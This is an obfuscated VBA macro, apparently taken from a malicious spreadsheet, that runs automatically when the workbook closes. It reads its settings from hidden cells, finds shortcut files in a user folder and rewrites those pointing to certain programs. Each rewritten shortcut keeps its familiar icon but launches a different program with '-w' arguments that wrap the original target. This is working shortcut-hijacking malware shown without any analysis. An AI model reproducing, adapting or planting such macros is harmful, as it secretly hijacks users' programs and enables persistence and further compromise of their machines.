Sub Auto_Close()
Set wtNuOvr = CreateObject(activeSheet.Range("BF61").value)
Set moEpLrOf = CreateObject(activeSheet.Range("BI61").value)
Set ZmvjdL = moEpLrOf.GetFolder(wtNuOvr.SpecialFolders(activeSheet.Range("BK61").value))
For Each eTybNKD In ZmvjdL.Files
If(InStr(Lcase(eTybNKD), ".lnk")) Then
Set fIURAt = wtNuOvr.CreateShortcut(wtNuOvr.SPecialFolders(activeSheet.Range("BK61").value) & "\" & eTybNKD.name)
If(InStr(Lcase(fIURAt.targetPath), activeSheet.Range("BN61").value) or InStr(Lcase(fIURAt.targetPath), activeSheet.Range("BR61").value) or InStr(Lcase(fIURAt.targetPath), activeSheet.Range("BV61").value)) Then
fIURAt.IconLocation = fIURAt.targetpath
fIURAt.arguments = "-w " & activeSheet.Range("BY61").Value & fIURAt.targetPath & "'" & activeSheet.Range("CA61").Value
fIURAt.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("CB61").value
if(Len(fIURAt.arguments) < 1023) Then
fIURAt.save
end if
end if
end if
next eTybNKD
End Sub
